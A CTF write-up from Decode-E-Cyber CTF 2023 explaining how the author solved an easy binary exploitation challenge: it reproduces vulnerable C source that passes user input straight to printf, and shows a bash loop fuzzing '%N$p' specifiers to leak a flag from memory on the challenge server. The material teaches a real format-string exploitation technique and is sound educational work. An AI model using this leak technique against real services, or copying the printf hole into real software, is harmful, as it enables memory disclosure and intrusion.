I participated in Decode-E-Cyber CTF 2023 conducted by OWASP VIT Bhopal and we were the Winners! Team Pegasus with 1350 points. We were able to crack many challenges and got first, and I was the only one who solved the PWN / Binary Exploitation Challenges in the event.
This is the writeup for the Binary Exploitation Challenges.
Challenge — 1: The Aventure Begins
Difficulty :- Easy
The source code of the binary and a dummy flag was provided in the challenge, compiled binary was not provided in the challenge.
Let’s have a look at the source code.
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <time.h>
char *greetings[] = {
"Can't believe you made it!!",
"You have got that fire in you today!",
"You're here! Let's have some fun!",
"Ready to embark on an exciting journey?",
"Buckle up, it's going to be a wild ride!",
"You're about to enter a world of adventure.",
"Get ready for an amazing experience!",
"Welcome, let's get this party started!",
"Exciting times await, welcome aboard!",
"Your adventure begins now!",
"Step into the world of possibilities.",
"Join the fun and enjoy the ride!",
"The journey begins with you!",
"Prepare for a fantastic experience.",
"Welcome to the world of endless possibilities.",
"The stage is yours, shine bright!",
"Time to shine and have some fun!",
"Embrace the adventure that lies ahead.",
"You're in for a treat!",
"The fun starts now!",
};
int main() {
setvbuf(stdin, NULL, 2, 0);
setvbuf(stdout, NULL, 2, 0);
// Read the contents of the "flag.txt" file into a buffer
FILE *file = fopen("flag.txt", "r");
if (file == NULL) {
perror("Error opening file. Perhaps there is no such file as flag.txt in the current directory.\nn");
return 1;
}
char buffer[100];
if (fgets(buffer, sizeof(buffer), file) == NULL) {
perror("Error reading file\n");
fclose(file);
return 1;
}
fclose(file);
// Initialize random number generator
srand(time(0));
char userName[9];
for (int i = 0; i < 7; i++) {
printf("Enter your name: ");
fgets(userName, sizeof(userName), stdin);
userName[strcspn(userName, "\n")] = '\0';
int randomIndex = rand() % (sizeof(greetings) / sizeof(greetings[0]));
char message[200];
snprintf(message, sizeof(message), "Welcome %s! %s\n", userName, greetings[randomIndex]);
printf(message);
}
return 0;
}
By looking at the code, seems like the program is reading flag.txt, getting some input from the user, constructs a welcome message with the input prints the message using printf().
Notice how the message is supplied to the printf function, it is provided as the first argument to printf. So, there should be Format String Vulnerability.
Let’s compile it and run the program,
Yes it is! Format String / Memory leak vulnerability is confirmed. That means, we can leak the flag that’s already in the memory of the program.
For that, we need to know the correct offset to leak the flag. To leak different memory regions we can use %[number]$x or %[number]$p format specifiers. I am gonna fuzz through all numbers between 1 to 600, to find the right number that will leak the flag’s characters.
#!/bin/bash
for i in $(seq 0 600)
do
printf "$i ==>> "
#echo "%${i}\$p" | ./chall
echo "%${i}\$p"
doneWe already know that the flag starts with “OWASP{” , so while running the fuzzer, we can filter the output to only show the leak which has the “OWASP” as hex. We can use python to find the hex value for O,W,A,S and P.
O => 0x4f
W => 0x57
A => 41
We can now grep for 41574f to find the right number.
Note: I use 41574f (AWO) instead of 4f5741 (OWA) because the addresses are in Little-Endian.
Cool! The Right number is 34 (%34$p) that has one part of the flag leaked. It leaked 8 bytes(characters) of the flag (dummy flag). In order to leak the entire flag, we can try going from 34 to 39 or 40.
Okay, let’s check that on the target server and try to leak the original flag.
Again we can use Python to decode the hex to bytes and the flip each string to get the flag.
Voila! We got the entire Flag via memory leak!
Thanks! Hope you learned something.
I will publish the part-2 soon.
Happy Hacking!
